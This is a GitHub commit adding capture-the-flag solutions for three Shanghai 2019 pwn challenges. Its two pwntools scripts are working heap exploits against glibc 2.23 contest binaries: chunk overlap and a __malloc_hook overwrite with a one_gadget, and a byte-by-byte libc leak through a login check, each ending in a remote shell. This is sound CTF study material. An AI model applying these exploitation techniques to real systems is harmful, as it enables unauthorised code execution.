Commit 872f857

committed

long time no see, glibc 2.23 heap

1 parent 31462db commit 872f857Copy full SHA for 872f857

File tree

11 files changed

+247

-0

lines changed

Shanghai2019_boringheap
Shanghai2019_login
Shanghai2019_slient_note

11 files changed

+247

-0

lines changed

`‎Shanghai2019_boringheap/libc.so‎`

1.78 MB

Binary file not shown.

`‎Shanghai2019_boringheap/pwn‎`

9.99 KB

Binary file not shown.

`‎Shanghai2019_boringheap/pwn.i64‎`

210 KB

Binary file not shown.

`‎Shanghai2019_boringheap/solve.py‎`

Lines changed: 85 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,85 @@`
	`1`	`+#!/usr/bin/env python`
	`2`	`+# -- coding: utf-8 --`
	`3`	`+`
	`4`	`+from pwn import *`
	`5`	`+from time import sleep`
	`6`	`+context.log_level = "critical"`
	`7`	`+context.binary = "./pwn"`
	`8`	`+elf = context.binary`
	`9`	`+# libc = elf.libc`
	`10`	`+libc = ELF("./libc.so")`
	`11`	`+libc.sym['main_arena'] = 0x3c4b20`
	`12`	`+libc.sym['one_gadget'] = 0xf1147`
	`13`	`+`
	`14`	`+# io = process("./pwn", env = {"LD_PRELOAD": "./libc.so"})`
	`15`	`+io = remote("8sdafgh.gamectf.com", 10001)`
	`16`	`+`
	`17`	`+def DEBUG():`
	`18`	`+ success("malloc @ {:#x}".format(0xCA8))`
	`19`	`+ success("free @ {:#x}".format(0xDFB))`
	`20`	`+ success("show @ {:#x}".format(0xF30))`
	`21`	`+ success("edit @ {:#x}".format(0x109B))`
	`22`	`+ pause()`
	`23`	`+`
	`24`	`+def add(choice, cont):`
	`25`	`+ io.sendlineafter("Exit\n", "1")`
	`26`	`+ io.sendlineafter("Large\n", str(choice))`
	`27`	`+ io.sendafter("Content:\n", cont)`
	`28`	`+ sleep(0.01)`
	`29`	`+`
	`30`	`+def edit(idx, where, cont):`
	`31`	`+ io.sendlineafter("Exit\n", "2")`
	`32`	`+ io.sendlineafter("update?\n", str(idx))`
	`33`	`+ io.sendlineafter("update?\n", str(where))`
	`34`	`+ io.sendafter("Content:\n", cont)`
	`35`	`+ sleep(0.01)`
	`36`	`+`
	`37`	`+def delete(idx):`
	`38`	`+ io.sendlineafter("Exit\n", "3")`
	`39`	`+ io.sendlineafter("delete?\n", str(idx))`
	`40`	`+`
	`41`	`+`
	`42`	`+def show(idx):`
	`43`	`+ io.sendlineafter("Exit\n", "4")`
	`44`	`+ io.sendlineafter("view?\n", str(idx))`
	`45`	`+`
	`46`	`+add(1, '0' * 0x20)`
	`47`	`+add(2, '1' * 0x30)`
	`48`	`+add(3, '2' * 0x40)`
	`49`	`+add(2, '3' * 0x30)`
	`50`	`+add(3, flat(0x21) * 8)`
	`51`	`+`
	`52`	`+edit(1, 0x80000000, flat('0円' * 0x18, 0x101, '\n'))`
	`53`	`+delete(1)`
	`54`	`+`
	`55`	`+add(2, '4' * 7 + '\n')`
	`56`	`+show(5)`
	`57`	`+libc.address = u64(io.recvuntil("\x7f")[-6: ] + '0円0円') - 328 - libc.sym['main_arena']`
	`58`	`+success("libc @ {:#x}".format(libc.address))`
	`59`	`+`
	`60`	`+add(3, '5' * 0x40)`
	`61`	`+add(2, '6' * 0x30)`
	`62`	`+`
	`63`	`+# 2 6 overlap; 3 7 overlap`
	`64`	`+delete(2)`
	`65`	`+edit(6, 0, flat(libc.sym['main_arena'] + 0x10, '\n'))`
	`66`	`+`
	`67`	`+delete(3)`
	`68`	`+edit(7, 0, flat(0x51, '\n'))`
	`69`	`+`
	`70`	`+`
	`71`	`+add(3, '7' * 0x40)`
	`72`	`+add(2, '8' * 0x30)`
	`73`	`+`
	`74`	`+# add(3, cyclic(n = 8, length = 0x40))`
	`75`	`+add(3, fit({0x38: flat(libc.sym['__malloc_hook'] - 0x23)}, filler = '0円'))`
	`76`	`+`
	`77`	`+add(1, "/bin/sh0円\n")`
	`78`	`+# DEBUG()`
	`79`	`+# add(1, cyclic(n = 8, length = 0x20))`
	`80`	`+add(1, flat('0円' * 19, libc.sym['one_gadget'], '\n'))`
	`81`	`+`
	`82`	`+io.sendlineafter("Exit\n", "1")`
	`83`	`+io.sendlineafter("Large\n", '1')`
	`84`	`+`
	`85`	`+io.interactive()`

`‎Shanghai2019_login/libc-2.23.so‎`

1.78 MB

Binary file not shown.

`‎Shanghai2019_login/login‎`

9.99 KB

Binary file not shown.

`‎Shanghai2019_login/login.i64‎`

185 KB

Binary file not shown.

`‎Shanghai2019_login/solve.py‎`

Lines changed: 99 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,99 @@`
	`1`	`+#!/usr/bin/env python`
	`2`	`+# -- coding: utf-8 --`
	`3`	`+`
	`4`	`+from pwn import *`
	`5`	`+from time import sleep`
	`6`	`+context.log_level = "critical"`
	`7`	`+context.binary = "./login"`
	`8`	`+elf = context.binary`
	`9`	`+libc = elf.libc`
	`10`	`+libc.sym['main_arena'] = 0x3c4b20`
	`11`	`+libc.sym['one_gadget'] = 0x4526a`
	`12`	`+`
	`13`	`+# io = process("./login")`
	`14`	`+io = remote("8sdafgh.gamectf.com", 20000)`
	`15`	`+`
	`16`	`+def DEBUG():`
	`17`	`+ success("free @ {:#x}".format(0x400CA8))`
	`18`	`+ success("malloc @ {:#x}".format(0x40098D))`
	`19`	`+ success("strcmp @ {:#x}".format(0x400B94))`
	`20`	`+ success("edit @ {:#x}".format(0x400DAB))`
	`21`	`+ pause()`
	`22`	`+`
	`23`	`+def login(idx, length, pwd):`
	`24`	`+ io.sendlineafter("Choice:\n", "1")`
	`25`	`+ io.sendlineafter("id:\n", str(idx))`
	`26`	`+ io.sendlineafter("length:\n", str(length))`
	`27`	`+ io.sendafter("password:\n", pwd)`
	`28`	`+ sleep(0.01)`
	`29`	`+ return io.recvline()`
	`30`	`+`
	`31`	`+def register(idx, length, pwd):`
	`32`	`+ io.sendlineafter("Choice:\n", "2")`
	`33`	`+ io.sendlineafter("id:\n", str(idx))`
	`34`	`+ io.sendlineafter("length:\n", str(length))`
	`35`	`+ io.sendafter("password:\n", pwd)`
	`36`	`+ sleep(0.01)`
	`37`	`+`
	`38`	`+def delete(idx):`
	`39`	`+ io.sendlineafter("Choice:\n", "3")`
	`40`	`+ io.sendlineafter("id:\n", str(idx))`
	`41`	`+`
	`42`	`+def edit(idx, pwd):`
	`43`	`+ io.sendlineafter("Choice:\n", "4")`
	`44`	`+ io.sendlineafter("id:\n", str(idx))`
	`45`	`+ io.sendafter("pass:\n", pwd)`
	`46`	`+ sleep(0.01)`
	`47`	`+`
	`48`	`+register(0, 0x100, '0' * 0x100)`
	`49`	`+register(1, 0x18, '1' * 0x18)`
	`50`	`+`
	`51`	`+delete(0)`
	`52`	`+`
	`53`	`+register(2, 0x100, 'x' * 4)`
	`54`	`+# login(0, 5, 'x' * 4)`
	`55`	`+`
	`56`	`+main_arena_part = 0`
	`57`	`+for i in range(0, 256)[::-1]:`
	`58`	`+ # success(i)`
	`59`	`+ if "Login success!" in login(0, 6, 'x' * 4 + chr(i) + '\x7f'):`
	`60`	`+ main_arena_part = chr(i) + '\x7f'`
	`61`	`+ print(hexdump(main_arena_part))`
	`62`	`+ break`
	`63`	`+`
	`64`	`+`
	`65`	`+edit(2, 'x' * 11)`
	`66`	`+for i in range(0, 256)[::-1]:`
	`67`	`+ # success(i)`
	`68`	`+ if "Login success!" in login(0, 14, 'x' * 11 + chr(i) + main_arena_part):`
	`69`	`+ main_arena_part = chr(i) + main_arena_part`
	`70`	`+ print(hexdump(main_arena_part))`
	`71`	`+ break`
	`72`	`+`
	`73`	`+delete(0)`
	`74`	`+register(3, 0x100, 'x' * 2)`
	`75`	`+for i in range(0, 256)[::-1]:`
	`76`	`+ # success(i)`
	`77`	`+ if "Login success!" in login(0, 6, 'x' * 2 + chr(i) + main_arena_part):`
	`78`	`+ main_arena_part = chr(i) + main_arena_part`
	`79`	`+ print(hexdump(main_arena_part))`
	`80`	`+ break`
	`81`	`+`
	`82`	`+edit(3, 'x' * 9)`
	`83`	`+for i in range(0, 256)[::-1]:`
	`84`	`+ # success(i)`
	`85`	`+ if "Login success!" in login(0, 14, 'x' * 9 + chr(i) + main_arena_part):`
	`86`	`+ main_arena_part = chr(0x78) + chr(i) + main_arena_part`
	`87`	`+ print(hexdump(main_arena_part))`
	`88`	`+ break`
	`89`	`+`
	`90`	`+libc.address = u64(main_arena_part + '0円0円') - libc.sym['main_arena'] - 88`
	`91`	`+print("libc @ {:#x}".format(libc.address))`
	`92`	`+`
	`93`	`+delete(1)`
	`94`	`+register(4, 0x18, flat(0x602020, libc.sym['one_gadget']))`
	`95`	`+`
	`96`	`+# DEBUG()`
	`97`	`+login(1, 8, flat('0円' * 8))`
	`98`	`+`
	`99`	`+io.interactive()`

`‎Shanghai2019_slient_note/pwn‎`

10.3 KB

Binary file not shown.

`‎Shanghai2019_slient_note/pwn.i64‎`

177 KB

Binary file not shown.

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commit 872f857

File tree

11 files changed

11 files changed

`‎Shanghai2019_boringheap/libc.so‎`

`‎Shanghai2019_boringheap/pwn‎`

`‎Shanghai2019_boringheap/pwn.i64‎`

`‎Shanghai2019_boringheap/solve.py‎`

`‎Shanghai2019_login/libc-2.23.so‎`

`‎Shanghai2019_login/login‎`

`‎Shanghai2019_login/login.i64‎`

`‎Shanghai2019_login/solve.py‎`

`‎Shanghai2019_slient_note/pwn‎`

`‎Shanghai2019_slient_note/pwn.i64‎`

0 commit comments